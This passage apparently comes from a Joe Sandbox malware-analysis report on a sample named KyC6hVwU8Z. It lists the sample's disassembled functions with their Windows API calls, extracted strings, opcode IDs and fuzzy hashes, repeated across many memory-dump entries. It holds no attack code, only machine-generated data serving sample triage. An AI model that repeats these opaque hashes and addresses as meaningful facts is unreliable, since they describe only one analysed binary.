                                                              • RtlAllocateHeap.NTDLL(00000000,001FDFD7,?,?,001FDFD7,00000220,?,?,?), ref: 001FED68
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 29d99e738b3bf7abeb92f8234b33aba13dd43b2b7eaaf33dd24ab73929388280
                                                              • Instruction ID: 362d6811d9104f8f991d11c5e311fbdc53f3fe9ef7416ee6170d1bdbde213b42
                                                              • Opcode Fuzzy Hash: 29d99e738b3bf7abeb92f8234b33aba13dd43b2b7eaaf33dd24ab73929388280
                                                              • Instruction Fuzzy Hash: 65E0653114175C56D7222BF59C05BBA36C89F613A0F154221EF05969B2CF20CC0181E1
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00207A50,?,?,00000000,?,00207A50,00000000,0000000C), ref: 00207DC9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 4217aec43e11751fb8455820bec9888c219d98228c8f501692a066a7de121ae8
                                                              • Instruction ID: 083dec4b2886d6f0d54896085a43cba1b602f5031e65410bbc42905c75e5698f
                                                              • Opcode Fuzzy Hash: 4217aec43e11751fb8455820bec9888c219d98228c8f501692a066a7de121ae8
                                                              • Instruction Fuzzy Hash: 86D06C3200020DBBDF028F84EC06EDA3BAAFB4C724F018000FA1856060C732E872AB90
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001F57F6
                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001F5804
                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 001F5815
                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 001F5826
                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 001F5837
                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 001F5848
                                                              • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 001F5859
                                                              • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 001F586A
                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 001F587B
                                                              • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 001F588C
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 001F589D
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 001F58AE
                                                              • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001F58BF
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001F58D0
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 001F58E1
                                                              • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 001F58F2
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 001F5903
                                                              • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 001F5914
                                                              • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 001F5925
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 001F5936
                                                              • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 001F5947
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 001F5958
                                                              • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 001F5969
                                                              • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 001F597A
                                                              • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 001F598B
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001F599C
                                                              • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001F59AD
                                                              • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001F59BE
                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001F59CF
                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001F59E0
                                                              • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 001F59F1
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001F5A02
                                                              • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 001F5A13
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 001F5A24
                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 001F5A35
                                                              • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 001F5A46
                                                              • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 001F5A57
                                                              • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 001F5A68
                                                              • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 001F5A79
                                                              • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 001F5A8A
                                                              • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 001F5A9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                              • API String ID: 667068680-295688737
                                                              • Opcode ID: c5e8f5931bd7d02683fe6b3fa747080c7a6bc5a90675df42fbea3c5a025f73ef
                                                              • Instruction ID: f08b39d44b798feba2c81a9cd5a51bd6dae3adb92255ad0bb0b99dd40412bdc6
                                                              • Opcode Fuzzy Hash: c5e8f5931bd7d02683fe6b3fa747080c7a6bc5a90675df42fbea3c5a025f73ef
                                                              • Instruction Fuzzy Hash: 39616971DE2310AFCB50AFB4BD1D8DA3AA8BE2A741345852AB605D2DF5DFB84021CF54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C9D~$C9D~$P]{?$P]{?$P]{?$P]{?$d
                                                              • API String ID: 0-1146462563
                                                              • Opcode ID: d4ade30a219af112bf87432efe07c2dc046540e9167fb156193903d74b1f1a35
                                                              • Instruction ID: 3194f0d734068aa85702ba402d681be14108bd8ae355dd89e269d1377c4c17a8
                                                              • Opcode Fuzzy Hash: d4ade30a219af112bf87432efe07c2dc046540e9167fb156193903d74b1f1a35
                                                              • Instruction Fuzzy Hash: 7EF32A7BFB5A100B674CC8BA8CA63EB56C357E8314B1EE43E595AD7245ECBDCC060684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Ur7$Ur7$Ur7$Ur7$Ur7$Ur7$Ur7$Ur7$Vr7$Vr7$Vr7$Vr7
                                                              • API String ID: 0-354343260
                                                              • Opcode ID: 17b00955d93d3fdc83bcfc85406b4d5e5ecf0e1b3f56796931066418e356b88d
                                                              • Instruction ID: 85a52d2b42f45767df2b9a9dc68dd5575a4b7355327dd4153a322236ea499e08
                                                              • Opcode Fuzzy Hash: 17b00955d93d3fdc83bcfc85406b4d5e5ecf0e1b3f56796931066418e356b88d
                                                              • Instruction Fuzzy Hash: C533FA6BBA15101FFB48887988EA3D71BC347E6314F1BF43A4999C7292DC6F884E5B50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *Ij$*Ij
                                                              • API String ID: 0-1840074257
                                                              • Opcode ID: 005cfdb75a6865ecd2636b2a2e04db7c2c139c5872187340fdec75d2d6d83a71
                                                              • Instruction ID: ff6e4e6ea8795ba9253ad7660e18eb0413a866d4de7830e07ada33453a1117f1
                                                              • Opcode Fuzzy Hash: 005cfdb75a6865ecd2636b2a2e04db7c2c139c5872187340fdec75d2d6d83a71
                                                              • Instruction Fuzzy Hash: 9EC30C7BBA15100FFB488879C8AA3D75BC347E6314F1BE43A4999C7252DCAF884E5B50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: d60f0fb687eac54fcb16fa97f20ea0f3918c7298a52e73391445b6a85d783a19
                                                              • Instruction ID: 0f04927fa0282a1baa8b369cda4cc2d7c887b2bbd5b1bd53e5d3dd92f69f3ac3
                                                              • Opcode Fuzzy Hash: d60f0fb687eac54fcb16fa97f20ea0f3918c7298a52e73391445b6a85d783a19
                                                              • Instruction Fuzzy Hash: E1D24A71E286298FDB64CF28DD447EAB7B5EB44304F1441EAD40DE7282E778AE918F41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *Ij$*Ij$*Ij$qm1/$rm1/$rm1/
                                                              • API String ID: 0-4165714967
                                                              • Opcode ID: 51cc8eb4538ec067bfee78b36f97c06c353669195de89a17b94433361ce549fc
                                                              • Instruction ID: b882835b52e3c78fe1eea822e256a2bd26f081f2332251c4edf45673aa565409
                                                              • Opcode Fuzzy Hash: 51cc8eb4538ec067bfee78b36f97c06c353669195de89a17b94433361ce549fc
                                                              • Instruction Fuzzy Hash: 17D2D42BB956101FFB448879C4FA3E71BC347A6314F2BB43A4999C7292DC5B884E9F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ~r$ ~r$ ~r$;h$;h$;h
                                                              • API String ID: 0-3426399392
                                                              • Opcode ID: 69f50c42400870ba693d177d5315a2eb94fac4ca90f4a89e9686b17e86d10eb2
                                                              • Instruction ID: 5c0cb1f13908e793c8281acb04dcb37c148f51d633cc2b01c04ad8744a6af12b
                                                              • Opcode Fuzzy Hash: 69f50c42400870ba693d177d5315a2eb94fac4ca90f4a89e9686b17e86d10eb2
                                                              • Instruction Fuzzy Hash: EDB2FB7BB655100FEB48847688EA3EB1BC347E6314F2BF43A4989C7252DC6F484E5B94
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 001C4EB6
                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 001C5E40
                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 001C5E47
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                              • String ID:
                                                              • API String ID: 2261580123-0
                                                              • Opcode ID: 92d23829256d373fa7c97983d72f1b98ad3f1dc50efd50d4b0f5a9f413e89c6d
                                                              • Instruction ID: d951386e5eceef437f6b7337cdf04451fc53b365b017eb23ef9e70276697ee5a
                                                              • Opcode Fuzzy Hash: 92d23829256d373fa7c97983d72f1b98ad3f1dc50efd50d4b0f5a9f413e89c6d
                                                              • Instruction Fuzzy Hash: F072F77BFB59200BA74C887A8C663EB56C357E8715B1FE43E494AD7255ECBD8C060680
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f3b0bfaf6c681b77f1afa7df557740fb38ccb51464f386d81a31fc5b04ad2319
                                                              • Instruction ID: 3e69fae480c60aa2e7d70d807f09151554c6c735bd59f22a02390be55f2b9f2b
                                                              • Opcode Fuzzy Hash: f3b0bfaf6c681b77f1afa7df557740fb38ccb51464f386d81a31fc5b04ad2319
                                                              • Instruction Fuzzy Hash: 39024B71E1121A9FDF14CFA8C8846AEFBF5FF48314F248269D919A7381D731A925CB90
                                                              APIs
                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00200E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: acd33c4ca5bc5244fbebe5c532047a9fe7696cbf3dd01d8fe843e123faa24f68
                                                              • Instruction ID: 05451e26d474e5ab953a184d417ab11aae2ab2df8cc3301285755cee38d8efee
                                                              • Opcode Fuzzy Hash: acd33c4ca5bc5244fbebe5c532047a9fe7696cbf3dd01d8fe843e123faa24f68
                                                              • Instruction Fuzzy Hash: 2371D27191525AAFEF309F64CCCDBFAB7B8EB05300F1441D9E008A7292DA315E919F10
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EE$EE$EE$xJ!
                                                              • API String ID: 0-3626210246
                                                              • Opcode ID: ef17cd2783a86d2da901bbb14f0fcea71635f58ab623ab6d190332950e7c79c1
                                                              • Instruction ID: 5edf9fe2af09f84d99f655b3a7d5f664c1c30d3369aa89cd6267fae6bc00124e
                                                              • Opcode Fuzzy Hash: ef17cd2783a86d2da901bbb14f0fcea71635f58ab623ab6d190332950e7c79c1
                                                              • Instruction Fuzzy Hash: 3962287BF659240BA70CC87A8CA63EB66C347E8714F1EE43E594AD7241DDBE8C064684
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001F60B0
                                                              • IsDebuggerPresent.KERNEL32 ref: 001F617C
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001F619C
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 001F61A6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 61883a0190a7cd3a51e2ff948fd2f8d7022afc5d5ab142a59197b5a51afeec1c
                                                              • Instruction ID: fbc2f81273c69fb6a3e25d6716a7a0e47aecfc4294888835dd163eeefcb0b247
                                                              • Opcode Fuzzy Hash: 61883a0190a7cd3a51e2ff948fd2f8d7022afc5d5ab142a59197b5a51afeec1c
                                                              • Instruction Fuzzy Hash: 60313875D0531CDBDB20DFA0D989BDDBBB8AF18300F1041EAE50CAB250EB715A858F44
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095590868.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095613630.0000000000217000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095641891.0000000000219000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1b0000_KyC6hVwU8Z.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: =Q4l$=Q4l
                                                              • API String ID: 0-665959848
                                                              • Opcode ID: 05c36b65a42c0c8b81e1889ec25ae3cef0cbff6dff9f853fbee051b4c5bd7773
                                                              • Instruction ID: 70f45abf21add3a2bf129636bfe5c85c22fd8fc81aeabebaacadec9b745a6899
                                                              • Opcode Fuzzy Hash: 05c36b65a42c0c8b81e1889ec25ae3cef0cbff6dff9f853fbee051b4c5bd7773
                                                              • Instruction Fuzzy Hash: 7B03FC6BBA55100FFB48847A88F93E75BC347E6314F1FB43A4999C7292DCAB844E5B40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3095420175.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                                                              • Associated: 00000000.00000002.3095354294.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095501708.000000000020B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3095530468.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
